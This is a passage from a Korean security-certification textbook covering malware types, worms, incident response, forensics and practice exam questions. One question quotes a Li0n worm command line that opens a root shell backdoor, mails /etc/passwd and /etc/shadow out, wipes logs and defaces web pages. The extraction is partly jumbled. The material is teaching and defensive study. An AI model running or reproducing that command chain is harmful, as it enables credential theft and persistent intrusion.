된다. 따라서 완벽하게 백신 프로그램을 피해간다는 의도보다는 암호해독루틴을 포함시키는데 걸리는 시간을 이용해서 바이러스 확산 시간을 확보하기 위한 의도로 만들어지는 것이 다. 그렇지만 실행이 시작되는 암호해독부분이 일정하므로 역시 간단한 바이러스로 분류된다. 느림보 바이러스(slow virus) 등이 여기에 포함된다. o 3세대 은폐형 바이러스(1993~1994) 자신을 은폐하고 사용자나 백신프로그램에 거짓 정보를 제공하기 위해 다양한 기법을 사용하는 바이러 스를 말한다. 1, 2세대의 경우보다 한 단계 발전된 형태이다. 은폐 기법을 사용하여 원래의 파일 크기 를 보여줌으로써 감염자나 백신제작자 모두 감염 사실을 눈치 채지 못하도록 하여 진단을 어렵게 만드 는 방법이 있다. 브레인 바이러스 등이 이 기법을 사용한다. 브레인 바이러스는 최초의 바이러스임에 도 3세대 기법을 사용하고 있다. o 4세대 갑옷형 바이러스(1994~1997) 다양한 암호와 은폐 기법이 사용되는 바이러스로 처음에 만들어질 때는 어떠한 백신으로도 진단할 수 없도록 하기 위한 연구 차원에서 만들어진 연구용 바이러스였다. 제작 후 백신 제작자들에게 샘플로 보내지게 되었고, 백시제작자들은 백신제작을 시도했다. 그런데 이 바이러스 또한 일정한 변형 루틴을 가지고 있기 때문에 결국은 백신이 나오게 되었는데, 이 때 연구용으로 쓰려고 했던 바이러스 소스가 공개되면서 많은 4세대 바이러스가 생겨나게 되었다. 고 래 바이러스 등이 있다. o 5세대 매크로 바이러스(1996~ ) 매크로 바이러스는 전 세계적으로 급속히 확산되고 있는 새로운 형태의 바이러스로 마이크로소프트사 의 오피스 프로그램에 있는 매크로 기능을 이용하며 전 세계적으로 계속 발견되고 있다. 실행파일이 아닌 문서 파일을 공격함으로써 기존의 바이러스 개념의 수정이 불가피하게 되었다. 354
355 (나) 감염 부위에 따른 컴퓨터 바이러스 분류 바이러스 프로그램이 위치하는 영역에 따른 것으로 부트(Boot) 바이러스, 파일(File) 바이러스, 부트/파 일(Boot/File) 바이러스, 매크로(Macro) 바이러스로 나눌 수 있다(표 8-10 참고). (다) 바이러스 유형에 따른 컴퓨터 바이러스 분류 바이러스는 유형에 따라 크게 겹쳐쓰기형, 비겹쳐쓰기형, 메모리 상주형, 호출형 바이러스로 구분할 수 있으며 다음 [표 8-11]은 각각의 바이러스 유형에 대한 특징이다. 355
356 (3) 백신 프로그램 백신 프로그램은 이 특수문자열(바이러스 패턴코드)이 존재하는지를 검색하여 바이러스 감염 여부를 판별하는 프로그램이다. 컴퓨터 바이러스 진단의 기본 원리는 문자열 비교(string compare)이다. 즉, 컴퓨터 바이러스 프로그램 에서 일부분을 선택해 비교문자열(바이러스 패턴 코드)로 삼고, 해당 문자열이 존재하는지 검색하는 것 이다. 다음 [표 8-12]는 백신 프로그램이 바이러스를 진단하는 방법에 대한 설명이다. 356
357 나. 백도어 백도어(Back door)는 원래 기술지원 및 유지보수의 편의성을 위해 시스템 설계자가 만들어 놓는 비밀 통로의 의미로 식별, 인증 등의 정상적인 보안 절차를 거치지 않고 접근이 인가되는 프로그램을 뜻한 다. 그러나 현재는 악의적인 공격에 많이 사용되어 보안 절차 없이 프로그램 또는 시스템에 접근하여 사용자의 정보 및 자원을 몰래 빼내어 갈 수 있는 악성 프로그램을 말한다. 다음 [8-13]은 백도어를 종류별로 구분하여 설명한 것이다. 357
358 다. 트로이 목마 트로이 목마(Trojan Horse)는 정상적인 프로그램이지만 악의적인 작업을 수행하는 숨겨진 기능이 있다. 트로이 목마는 자기복사 기능이나 시스템속도 저하와 같은 현상을 일으키지는 않으므로, 다른 파일에 감염시키는 일이 없어 바이러스와 구별되지만 피해를 입힌다는 점에서는 바이러스 이상으로 위험한 존 재이다. 라. 웜 (1) 정의 웜(Worm)은 원래 벌레 라는 뜻으로, 분산형 시스템이나 네트워크에 상주하는 독립 프로그램 또는 실행 가능 코드 모듈을 말한다. 컴퓨터 내의 다른 시스템에는 직접적인 영향을 미치지 않고 단순히 기억 장 소 내에서 자기 자신을 계속적으로 증식하는 프로그램으로 시스템 자체의 파일을 파괴하거나 변경하는 등의 악의적 의도는 없다. 그러나 웜은 CPU 시간, 입출력 채널 또는 시스템 메모리 등의 가능한 많은 시스템 자원들을 이용하기 때문에 인터넷 전체 시스템의 성능에 영향을 줄만큼 엄청난 영향력을 가지고 있다. (2) 역사 일반적으로 웜은 윈도우 운영체제 시스템에만 존재하는 것으로 인식되고 있으나 윈도우 이전 도스 (DOS)를 사용하던 시절에도 웜은 존재했었다. 당시 프로그램의 복사가 플로피 디스켓과 통신을 통해서 주로 이루지는 것이 고작이었기 때문에 웜은 그리 위험한 존재로 인식되지 못했다. 90년대 후반부터 인터넷이 대중화되면서 웜은 급속히 확산되어 그 피해가 늘고 있다. 실행코드 형태로 전자메일, 웹, 네트워크 공유 등을 통해 다른 사용자들에게 전파되는 형태의 인터넷 웜이 출연하고, 개 인용 컴퓨터가 대부분 윈도우 운영체제로 통일되면서, 누구나 쉽게 인터넷에서 바이러스 제작 도구를 다운로드받아 웜을 만들 수 있게 되었으며 이러한 이유로 인해 웜의 발생 및 확산 속도가 매우 빠르게 진행되고 그 피해 또한 커졌다. 지금까지 다양한 종류의 웜이 지속적으로 나타나고 있었지만 그 피해가 적어 잘 알려지지 않았으나, 최근에 러브바이러스, IIS/Sadmind, Code Red, Nimda 등과 같은 인터넷 웜이 전 세계적으로 큰 피해 를 주면서 웜의 존재가 널리 알려지고 있다. (3) 특징 o 인터넷을 통하여 전파됨 o 스스로 독립적으로 존재 가능하며 자가 복제 가능함- 바이러스는 어떠한 프로그램에 은밀히 삽입되 는 형태이므로 그 프로그램이 없으면 전파되지 못하는 반면 웜은 자체적으로 독립되는 프로그램으로 자가 번식력이 존재 o 컴퓨터의 자원을 이용하여 다른 컴퓨터로 전파 o 시스템 파일의 삭제 및 변경, 수퍼 유저의 권한 획득이 주 목적이 아님 358
359 (4) 전파 메커니즘 윈도우를 기반으로 하는 웜은 대부분 아래와 같은 방법으로 전파된다. o WSOCK32.DLL 변형(예, I-Worm/Happy99, I-Worm/Hybris) o 특정 애플리케이션 이용(예, 아웃룩, 아웃룩 익스프레스) o SMTP 서버 내장(예, I-Worm/Cholera) o 윈도우 공유 폴더 감염(예, I-Worm/Qaz, I-Worm/Msinit, I-Worm/Wininit) 요즘 큰 피해를 가져오는 인터넷 웜은 자동으로 취약성이 있는 시스템을 찾아서 공격하고, 공격이 성 공하면 자기 자신을 피해시스템에 복제하고, 그리고 해당 피해시스템에서 또 다시 다른 시스템을 공격 하는 메커니즘을 갖고 있다. (5) 종류 o 모리스 웜 년에 생성된 인터넷 상 최초의 자가 복제 웜 - 로버트 모리스가 제작함 - Sun과 백스의 시스템 6천대가 감염되어 마비됨 - 웜 대응을 위해 CERT(Computer Emergency Response Center)가 구성됨 o 전자메일 웜 - 전자메일을 통해 전파되는 웜 - 기존의 서버 시스템뿐만 아니라 개인 사용자들에게 피해가 확산 - 예) 러브레터, 안나쿠르니코바 등 o 밀레니엄 인터넷 웜 - 세기말(1990년대 말)에 다시 등장한 활성 웜- 예) 라멘, 리온, 아도르, 새드마인드, 치즈, 레드, 그리고 코드레드Ⅰ/Ⅱ, 님다 등 359
360 (6) 전망 지금까지의 인터넷 웜은 초기 형태에서 크게 벗어나지 못하고 있지만 향후 인터넷 웜의 기술은 계속 발전해갈 것이다. 지금보다 다양한 보안 취약성을 이용하여 새로운 전파 경로를 통해 다양한 운영체제 와 아키텍쳐를 가진 시스템에 영향을 미칠 것이다. 그리고 보다 은닉적으로, 지능적으로 바뀌면서 그리 고 다형성 바이러스(Polymorphic Virus)와 같이 스스로 형태를 변화시킬 수 있는 인터넷 웜이 등장하면 서 웜의 발견과 차단은 더욱 힘들질 것이며 그 피해는 급격히 증가할 것이다. 현재까지의 웜은 파일 삭제, 중요 정보 변조, 시스템 파괴 등과 같이 직접적인 피해를 줄 수 있는 코드 가 삽입되지 않았으나, 악의적인 코드를 가지게 되는 경우 상상을 초월하는 피해를 입힐 수도 있다. CodeRed 웜에 CIH 바이러스와 같은 시스템 파괴 코드가 들어 있었다면 그 피해는 훨씬 컸을 것이다. 이렇게 급속도로 발전하는 인터넷 웜에 대응하기 위해서는 조직마다 보안 요소를 정기적으로 점검하여 보안 수준을 향상시키는 것이 기본적으로 필요하다. 컴퓨터 시스템의 보안 취약성을 정기적으로 살펴 야 하고, 사용하지 않는 서비스는 외부에서 접근하지 못하도록 접속을 차단해 보안성을 향상시켜야 한 다. 웜 감염 시를 대비하여 중요한 데이터는 정기적으로 백업하고, 감염 이후에도 정상적인 서비스를 수행할 수 있도록 미리 정책을 수립, 구현되어 있어야 한다. 360
361 제 4절. 침해 사고 및 대응 chapter 1. 침해사고 분석 분석을 위해서 가장 먼저 선행되어야 하는 것이 관련 로그를 분석하는 것으로 다음 [표 8-14]는 로그 분석의 원칙에 대해 설명한 것이다. 361
362 chapter 2. 침해사고 대응 가. 책임과 권한 정보보호 침해사고에 대하여 신속하고 체계적인 대응을 위한 담당자들의 책임과 권한은 다음 [표 8-15]와 같다. 나. 침해사고 대응 업무 절차 다음 [표 8-16]은 침해사고 대응을 위한 업무 절차 및 책임에 대해 설명한 것이다. 362
363 (1) 침해사고의 인식 및 신고 o 정보보호 침해사고 발생시 침해사고 발견자는 정보보호 침해사고 신고서를 작성하여 정보보호 담당자에게 신고하여야 한다. o 정보보호 침해사고 신고서 작성 시 다음과 같은 항목의 침해사고 세부내용을 구체적이고 정확하게 작성하여야 한다. - 침해사고 발생 일시, 피해 상세내용, 공격자 정보(현재 확인된 사항), 침해사고 발견 경위, 현재 조치 사항 등 (2) 침해사고 대응 1단계(긴급조치) o 정보보호 침해사고 신고서를 접수하면, 해당 서버의 관리자와 함께 신속하게 대상 서버의 현재 상태 정보를 조사하여 실제해킹 사고인지 어떤 영향을 미쳤는지에 대하여 분석한다. 일반적인 이상 징후 는 2개 이상의 inetd 데몬, 네트워크 트래픽 급증, 이상한 프로세스의 수행, 이상한 Port의 open, 이 상한 계정의 존재 등이 있다. - 현재 사용 중인 프로세스 정보를 확인한다(#ps -ef). - 현재 접속 중인 네트워크 서비스의 연결 상태를 확인한다(#netstat -an). - 현재 로그인되어 있는 사용자의 정보를 확인한다(#w, #who, #whodo). - 공격자가 추가적인 정보 수집을 위하여 Sniffing 공격을 수행하는지 확인한다 (#ifconfig -in). - 시스템 관련 로그를 조사한다(syslog, messages, wtmp, utmp, lastlog, sulog, cronlog 등 종합적인 로그의 분석이 필요). o 관련정보 수집이 완료되었고, 공격이 계속 진행 중이며 피해확산이 우려될 경우, 즉시 서버의 네트 워크 연결을 단절시킨다(랜 포트에서 케이블을 제거). o 정보보호 담당자 및 네트워크 담당자에게 연락하여 라우터의 ACL의 적용 또는 침입차단시스템의 보 안정책을 적용하여 공격지 해당 서버로 연결되는 모든 접속을 차단한다. o 정보수집 및 긴급대응(네트워크 단절, ACL 또는 침입차단시스템을 통한 차단)이 완료되면, 침해사고 발생을 해당 서버에서 운영되고 있는 어플리케이션 담당자에게 통보한다. o 어플리케이션 담당자는 해당 응용시스템의 서비스 중지를 공지한다. o 침해사고 대응이 완료될 때까지 서비스 제공을 중지한다. o 대체 서버가 있을 경우 이를 통해 해당 응용시스템 서비스를 제공한다. 363
364 (3) 침해사고 대응 2단계(분석) o 1단계에서 수집한 정보 및 시스템 분석을 통하여 피해 상황과 원인을 파악한다. 침해사고의 정밀 분석을 위하여 공격 방법 및 공격 경로, 파일 변조, 설치된 백도어 등의 확인을 통하여 침해사고 내역을 정확하게 분석한다. - 확인된 공격자 IP를 바탕으로 공격자에 대한 추가정보를 취득한다(#traceroute xx.xx.xx.xx '공격자의 IP 주소 ). - 탐지된 공격자의 관련정보를 조사한다( o 파일 변조 및 백도어 등의 해킹 도구의 설치 여부 점검은 국내 침해사고 대응팀인 CERTCC-KR( 제공하는 기술자료/보안도구 내 침입탐지시스템 & 네트 워크 모니터링 도구 등을 이용한다. (4) 침해사고 대응 3단계(재발방지 조치) o 침해사고 분석보고서를 작성한다. o 침해사고에 대한 대책을 마련하여 적용한다. o 침해사고가 발생된 시스템의 OS를 신규 설치하여 서비스를 준비한다. o OS 및 어플리케이션 취약성을 보완한다(보안 패치의 적용). o 패스워드 파일 유출 시 관련 시스템 패스워드 모두를 변경한다. o 공격 진원지에 대한 접근을 통제하고, 해당 기관에 연락하여 재발방지를 위한 조치를 취한다. (5) 침해사고 결과 분석 및 보고서 작성 o 정보보호 담당자는 침해사고의 원인 및 대응조치 등에 대하여 침해사고 발생 유형 및 발생 날짜, 피해범위 및 정도, 침해사고 발생의 원인, 대응조치, 재발방지를 위한 보안대책 등의 내용을 포함 하여 침해사고 대응 결과보고서를 작성하여야 한다. (6) 침해사고 분석 및 대응 결과 승인 o 정보보호 책임자는 침해사고 대응결과에 대하여 검토 후 승인하고, 재발방지를 위해 필요한 후속 조치에 대하여 지원해야 한다. 364
365 다. 컴퓨터 포렌식스 (1) 컴퓨터 포렌식스 정의 포렌식스(Forensics)는 범죄사건 수사 또는 증거를 수집하기 위해 과학적이고 기술적인 기법을 사용하 는 것을 의미하며 컴퓨터 포렌식스(Computer Forensics)는 외부로 잘 드러나지 않는 증거를 찾아내기 위하여 컴퓨터를 조사하고 분석하는 기법을 의미한다. 컴퓨터 포렌식스는 1991년 이후 과학적으로 법의 응용과 관련되어 컴퓨터 보안그룹과 법조계에서 주 요한 주제가 되어 연구되어 왔다. 컴퓨터 포렌식스는 범행 후에 저장된 컴퓨터 데이터의 다양한 수준 의 분석을 위해 특별한 소프트웨어 도구와 기술이 요구되기 때문에 컴퓨터 하드디스크 드라이브의 부 검이라고 표현하기도 한다. 즉, 컴퓨터 포렌식스는 전자기 형태로 전송된 정보를 식별하고, 추출하고, 문서화하고, 보존하는 것 등 이 수행된다. 지문과 마찬가지로 디지털 증거는 외부에 드러나 있거나 숨겨져 있으므로 컴퓨터 포렌식 스에서 중요한 부분 중 하나는 숨겨있는 데이터를 찾아내고 평가하는 것이다. 디지털 증거를 수집하고 보존하는데 적용될 수 있는 컴퓨터 포렌식스 표준이 개발되어 있다. 디지털 증거는 다른 종류의 증거와 속성과는 크게 다르기 때문에 완전히 다른 처리 방법을 요구한다. 사이버 범죄 사건의 범죄자를 처벌하기 위해서는 법에 저촉되지 않는, 때로는 법에서 기술한 절차 그 대로 증거를 다뤄야 한다. 이러한 절차를 제대로 따르는 것은 재판에서 중요한 역할을 한다. 다음은 한 예로서 컴퓨터 증거 수집하는 절차를 정리한 것이다. o 발견 및 인지- 컴퓨터 저장장치는 또 하나의 파일 캐비닛일 뿐이며 잠재되어 있는 증거의 원천을 이해하고 발견하는 것은 수사관의 능력에 달려있다. o 보호- 수집 또는 압수된 증거자료의 물리적인 상태를 유지하는 것은 매우 중요하다. 문서는 훼손이 나 멸실되지 않도록 주의하고 컴퓨터 시스템은 온도, 습도, 먼지, 전자기 등에 민감하므로 주의를 기 울여 관리하여야 한다. o 현장 기록- 사건현장은 가능한 한 비디오카메라를 이용하여 문서, 장비, 케이블 연결 상태까지 빠짐 없이 기록하는 것이 권장된다. 365
366 o 수집- 문서 등 증거자료는 반드시 장갑을 사용하여 취급하여야 하며 증거 보관함은 봉인하여야 한다. 컴퓨터 저장매체는 비록 삭제된 것이라 하더라도 복구 할 수 있는 경우가 있으므로 가능한 모 든 저장매체를 확보한다. 소자기(Degaussing equipment)는 자기저장장치의 내용을 효과적으로 삭제 하는 용도로 쓰이는데 이러한 장비가 있는 경우 먼저 작동을 멈추도록 하여야 한다. o 식별/분류- 컴퓨터 증거는 나중에 서로 섞여 식별이 곤란할 수 있으므로 현장에서 미리 표시하여야 한다. 디스켓, 본체, 출력물 등은 유성펜이나 라벨을 사용한다. o 보존- 컴퓨터 증거는 전원을 끄면 없어지는 증거도 있을 수 있으므로 이러한 내용은 없는지 확인 하고 필요한 경우 전원을 끄기 전에 내용을 저장하여야 한다. 보존 시는 적절한 온도(40-90 degree F)와 습도(20~80%)를 유지하고 먼지가 많이 발생치 않는 곳에 보관하여야 하며 강한 자성을 가진 물체는 피해야 한다. o 운반- 모든 매체는 쓰기 금지와 라벨링이 되었는지 확인한다. 컨베이어벨트, 금속 탐지기, 엑스선 장비 등 강한 자기를 발생시키는 장치를 통과해서는 안 된다. 먼지나 다른 이물질에 오염되는 것 또한 매체를 손상시킬 수 있다. 디지털 증거 분류 일반적으로 증거에는 그 용도에 따라 감사 증거와 법적 증거로 나눌 수 있다 o 감사 증거 유형감사절차에 라 7가지의 증거유형이 있으며 감사 증거는 감사뿐만 아니라 보안성 검토에서 도 공통으로 사용되어 질 수 있다. - 물리적인 조사에의한 증거 : 감사자에 의한 유형적 자산의 조사와 셈을 통한 증거 - 참고인 진술에 의한 증거 : 감사자에 제 3자에게 정보를 요청하여 제공받는 것 - 문서에 의한 증거 : 감사자가 관련된 정보를 실증하는 문서와 기록을 검토하는 것 - 관찰에 의한 증거 : 감사자의 감각을 이용한 증거 - 질의에 의한 증거 : 감사자의 질문에 피 감사자가 구두나 문서로 답변하는 방식으로 얻은 증거 - 기계적인 정확성 조사 증거 : 자동화시스템의 계산에 대한 정확성을 테스트하여 얻은 정보 - 분석적 절차에 의한 증거 : 전년도와 금년도의 총 수익을 비교, 대조하는 등의 방식으로 이월잔액이 합당한 것 인지 판단 o 법적 증거 유형법적인증거와 감사 증거 모두는 제시된 문제에 관하여 진실과 거짓을 밝히고 심증에 대한 확신을 가져다준다.감사증거와 법적증거의 가장 큰 차이점은 감사증거는 문서에 많이 의존하고 법적증거는 구술에 의한 증거에 많이 의존한다는 것이다. 법적인 증거는 8가지 유형으로 나누어 볼 수 있다. - 최우선 증거:사실에 가장 만족할 만한 증거- 2차 증거: 문서의 복사본 등 최우선 증거에 못 미치는 증거로써 신뢰도가 떨어짐 - 직접적 증거: 가정이나 추론이 필요 없는 사실적 증거- 정황적 증거: 직접적인 증거가 될 수 없음 - 결론적 증거: 더 이상의 보충이 필요 없는 결론적 증거 - 보강증거: 기존증거에 대한 신념을 굳히게 하는 추가적인 증거 - 의견 증거: 보고 들은 것에 대한 진술증거 - 소문 증거: 목격자 이외의 사람으로부터 구술 등으로 얻은 간접 증거로서 정확도가 떨어짐 366
367 (2) 컴퓨터 포렌식스 도구 (가) 컴퓨터 포렌식스 도구 정의 컴퓨터 포렌식스 도구는 디지털 증거를 확보하기 위하여 특별히 고안된 컴퓨터 프로그램이나 이를 하드웨어와 결합시킨 장치를 말한다. 디지털 증거는 쉽게 변경될 수 있고, 변경되어도 이를 확인할 수 있는 방법이 제한되어 있기 때문에 디지털 증거를 수집하거나 보존하는 과정에서 복사도구와 같은 장비나 프로그램을 사용함으로써 절차의 객관화와 법정제시의 용이성을 얻을 수 있다. (나) 컴퓨터 포렌식스 도구 분류 다음 [표 8-17]은 컴퓨터 포렌식스 도구를 유형에 따라 분류한 것이다. 구분 하드디스크 복사도구 자료 검사 도구 무결성 도구 시스템 분석용 도구 복구용 도구 설명 원본의 변경이나 손상 없이 내용 그대로를 복사한다. 복사하는 디스크 는 한번도 사용하지 않은 것을 이용하여야 하는데 그렇지 않은 경우 복구 시에 원본과 다른 내용이 나타 날 수도 있다. 파일의 수정, 생성, 액세스 날짜나 내용을 보여주거나 파일 카탈로그를 만들어 주는 등의 기능을 하는 도구이다. 해쉬 함 수 등을 이용하여 자료가 변질되지 않았음을 증명하는데 이용 된다. 컴퓨터 증거자료는 변질되기 쉬운 특성으로 인하여 무결성 인증 여부가 매우 중요하게 인식되고 있으며 무결성에 문제가 있는 증거자 료는 증거로서의 효력을 상실할 수도 있다. 간단한 시스템 명령어부터 자동화된 분석도구에 이르기까지 여러 가지 분석용 도구가 있으나 번거로운 작업을 줄이는 데는 도움을 주지만 사 건과 직접 관련된 자료를 찾아내는 것은 조사자의 능력에 의존하는 경 우가 많다. 근래의 침해사고는 자신의 행위를 감추기 위하여 로그 등 감사 자료를 삭제하는 경우가 대부분이므로 복구용 도구는 포렌식스 도구에서 가장 중요한 부분으로 인식되고 있다. 디스크의 용량이 점점 커지고 응용프 로그램도 다양해지고 있어 복구용 도구에 보다 강력한 기능이 요구된 다. 367
368 제 8장. 침해 사고 대응 연습 문제 368
369 1. 내부 점검 도구의 기능과 설명이 옳지 않은 것은? 1 COPS, Tiger는 유닉스 시스템에서 보안문제를 찾는데 사용되는 스크립트를 모아 놓은 도구 이다. 2 Tripwire는 시스템 무결성을 점검하는 도구 이다. 3 Crack과 L0phtCrack은 패스워드 점검 도구 이다. 4 John the Ripper는 네트워크를 통하여 시스템의 취약성을 조사하는 도구이다. 2. 아래 로그는 최근 리눅스 시스템의 DNS 서버 취약성을 자동으로 공격하는 다양한 형태를 가진 Li0n웜을 보여주고 있다. Li0n웜과 로그에 대한 설명으로 옳지 않은 것은? PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PATH;export TERM=vt100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.lib;echo '10008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.conf;killall -HUP inetd;ifconfig - a>1i0n;cat /etc/passwd >>1i0n;cat/etc/shadow >>1i0n;mail [email protected] <1i0n;rm-fr 1i0n;rm -fr /.bash_history;echo >/var/log/messages;rm - rf /var/log/maillog;echo 'Powered by H.U.C(c0011i0n) i0n Crew' >index.html;echo '#!/bin/sh'>lion;echo 'nohup find / -name "index.html" - exec /bin/cp index.html {} \;'>>lion;echo 'tar -xf 1i0n.tar'>>lion;echo './1i0n.sh' >>lion;echo >>lion;echo >>lion;chmod 755 lion; 3. 침입자의 공격 중 제일 먼저 수행되는 것은 공격시스템에 대한 스캐닝이다. 다음 중 네트워 크 스캐닝 도구가 아닌 전반적인 시스템 취약성 분석 도구는 무엇인가? 1 COPS 2 tcpdump 3 sscan2k 4 Saint 4. sscan은 보안 취약성 스캐닝 도구로 유닉스 및 윈도우 시스템의 보안 취약성 점검 기능을 제 공한다. 아래는 특정 서버를 sscan으로 점검한 내용인데 다음 중 대상서버에 대한 설명으로 틀 린 내용은? <[ * report for host x.x.x.97 * <[ tcp port: 80 (http) ]> <[ tcp port: 23 (telnet) ]> <[ tcp port: 143 (imap) ]> <[ tcp port: 110 (pop-3) ]> <[ tcp port: 111 (sunrpc) ]> <[ tcp port: 79 (finger) ]> <[ tcp port: 25 (smtp) ]> <[ tcp port: 21 (ftp) ]> <[ tcp port: 22 (unknown) ]> <[ tcp port: 1114 (unknown) ]> --<[ *OS*: x.x.x.97: os detected: solaris 2.x -<[ *FINGER*: x.x.x.97: root: account exists. --<[ *VULN*: x.x.x.97: /cgi-bin/test-cgi here. --<[ *VULN*: x.x.x.97: solaris running statd (automountd remote?) ^Q --<[ *VULN*: x.x.x.97: solaris running nlockmgr.. remote overflow? ^M <[ * scan of x.x.x.97 completed * 1 대상서버의 운영체제는 솔라리스 2.x로 추정 된다. 2 웹 서비스를 제공하고 있다. 3 패스워드 유추 공격에 취약한 계정을 가지고 있다. 4 본 점검 결과 취약성이 발견되었으므로 관리자의 점검이 필요하다. 1 Li0n은 DNS서버를 운영하는 리눅스 시스템에 서 53번 포트가 열려 있는 시스템을 찾아 DoS 공격을 한다. 2 여기서 사용되는 Li0n 공격 프로그램은 10008번 포트를 백도어로 열어 놓는다. 3 /dev/.lib 디렉터리를 삭제하고 새롭게 /dev/.lib 디렉터리를 만들어 작업디렉터리로 사용하고 있으며, 관련 로그파일을 지운다. 4 /etc/passwd, /etc/shadow 파일을 [email protected] 계정으로 메일을 보내고 있다. 5.다음 중 보안 취약성에 대한 유용한 정보를 제 공할 수 있는 주요 도구가 아닌 것은? 1 SATAN 2 Nessus 3 nmap 4 Spoofing 369
370 6. 다음 중 취약성 점검 도구인 SATAN에 대한 설명으로 맞는 것은? 1 시스템 내의 파일과 디렉터리의 무결성을 검사 2 인터넷 상의 특정 시스템의 보안 상태를 점검 하는 도구로 Perl 언어로 개발 3 유닉스 시스템의 전반적인 보안 취약성을 검사 4 허락된 사용자 IP 주소로 위장하였는지를 검사 7. COPS는 유닉스에 취약한 패스워드 및 계정에 대한 점검 도구이다. 이에 대한 설명 중 옳지 않 은 것은? 1 유닉스 시스템 보안점검 프로그램 2 보안을 조사해 주는 실제 프로그램 + 작동 방법 & 결과를 해석하는 도큐먼트로 구성 3 단지 보안문제에 대하여 알려주기만 할 뿐 수정을 해 주지는 않음 4 MS SQL 데이터베이스 점검 가능 11. 공격자가 유닉스 시스템의 ps, ls, netstat, login 등 시스템 프로그램을 루트킷으로 바꿔치 기 하는 경우, 관리자가 이를 찾아내기는 쉽지 않다. 이런 경우를 대비하 여 원래 파일의 무결 성 점검을 하기 위한 도구로 Tripwire가 있는데, 다음 중Tripwire에 대한 설명 중 올바르지 않는 것을 고르시오. 1 MD5, SHA, CRC-32 등의 다양한 해쉬 함수를 제공한다. 2 시스템에 존재하는 파일에 대해 DB를 만들어 저장한 후 생성된 DB와 비교하는 방법을 사용한다. 3 무결성 검사를 할 디렉터리를 지정해 줄 수 있다. 4 해킹을 당한 후 설치하면 원래의 파일로 복구 해 준다. 12. 공격자는 침입을 시도하기 위한 사전 단계로 원격지의 네트워크와 시스템에 대한 정 보를 수 집하기 위해서 취약성 점검을 수행한다. 다음 중 네트워크 보안취약성 점검 도구가 아닌 것은? 8. COPS에 대한 설명 중 옳지 않은 것은? 1 쉘 상태에서 점검할 수 있는 많은 부분을 모두 점검한다. 2 시스템 관리자는 최종 결과물을 보고 기호에 따라 수정한다. 3 네트워크 보안 점검 도구이다. 4 파일 무결성이나 속성을 점검할 수 있다. 9. 아래의 내부 보안 점검 도구 중 성격이 가장 다른 하나는? 1 COPS 2 Tripwire 3 Tiger 4 시큐어닥터(SecuDr) 1.0 또는 Titan 10. 대표적인 네트워크 스캐닝 기능을 가진 도구 가 아닌 것은? 1 nmap 2 ssacn2k 3 NTcrack 4 nessus 1 nmap 2 fragrouter 3 firewalk 4 Tripwire 13. 아래의 특징을 제공하는 보안도구는 무엇인 가? 네트워크 패킷에 대한 grep 기능을 제공하는 도구로 pcap 기반으로 작성되었다. bpf 기반의 필터링 기능이 가능하고 패킷의 데이터에 대해서도 특정 문자열을 grep 해줄 수 있다. 현재, TCP, UDP, ICMP, Ethernet, PPP, SLIP, FDDI 프로토콜을 지원한 다. ICMP Covert channel 등을 분석하거나 탐지할 때 유용하다. 1 sof 2 xcfind 3 ngrep 4 kstat 370
371 14. OS 어플리케이션 보안 상태에 대한 설명이 다. 다음 중 옳지 않은 것은? 1 불필요한 Index Server 관련 ISAPI 파일이 제거되어 있는지 점검 2 디폴트에 설치된 샘플파일/폴더가 존재하는지 점검 3 불필요한 RDS(Remote Data Service)가 제거 되었는지 점검 4 cgi-bin 디렉터리가 제거되었는지 점검 15. 다음은 다양한 시스템 상에 존재하는 여러 보안 취약성들에 대한 설명이다. 아래 보기 중에 서 윈도우즈 시스템에 대한 보안 취약성이 아닌 것은? 1 NFS 파일공유나 NIS 등과 같이 광범위하게 사용되는 프로토콜 중의 하나로 윈도우 분산 처리 환경에서는 RPC 서비스들에서의 버퍼 오버플로 공격이 있다. 2 IIS가 설치될 때 몇몇 ISAPI 확장들이 자동 으로 설치됨으로써 ISAPI 확장 버퍼오버플로 취약성이 있다. 3 IIS RDS공격은 MDAC(Microsoft Data Access Components)의 한 컴포넌트로 RDS가 잘못 설정되어 있을 경우 서비스거부 공격이나 원격에서 관리자 권한으로 임의의 명령을 실행할 수 있는 취약성이다. 4 공격자는 부적절한 유니코드 UTF-8 시퀀스를 포함한 URL을 IIS서버에 전송함으로써 디렉 터리를 이동할 수 있고 임의의 스크립트까지 실행시킬 수 있다. 16. 크래커들은 대부분 시스템 파일 버그를 찾아 이들 프로그램들을 통해 침투하므로 보안에 위험 성을 주는 파일들은 가능한 빨리 찾아 신속히 업 그레이드하거나 삭제해 주어야 할 것이다. 이러 한 파일 점검 시 유용한 명령어 find를 사용하게 되는데 특정 목적으로 사용되는 find의 예로 적 절치 않은 것은? 1 SUID/SGID프로그램 확인: find / -type f \( -perm o -perm \) -exec ls -lg {} \; 2 유저 권한이 없는 파일 검색: find / -nouser -o -nogroup -print 3 30일 이전에 생성된.tmp로 끝나는 모든 파 일 삭제: find / -name '*.tmp' -mtime -30 -print -exec rm {} \; 4 write 권한 있는 파일(디렉터리)을 찾기: find / -type f \(-perm -2 -o -perm -20 \) -exec ls -lg {} \; 17. 침해사고 시 침입자가 루트권한을 획득하면 재침입시도를 위해 백도어를 숨겨 놓는 경우가 대부분이다. 이때 어떠한 프로세스를 보이지 않 도록 숨겨놓는 일반적인 백도어의 점검 방법을 설명한 것이다. 다음 중 옳지 않은 것은? 1 find -option 사용하여 일반적으로 알려진 백도어의 존재를 점검한다. 2 커널 백도어의 경우 일반적으로 제거하고도 시스템 운영이 안전하다. 3 네트워크 트래픽 분석 도구를 이용하여 비정상적인 트래픽이 존재하는지 점검한다. 4 ps -option 사용하여 수상한 프로세스가 실행 중인지 백도어의 존재를 점검한다. 371
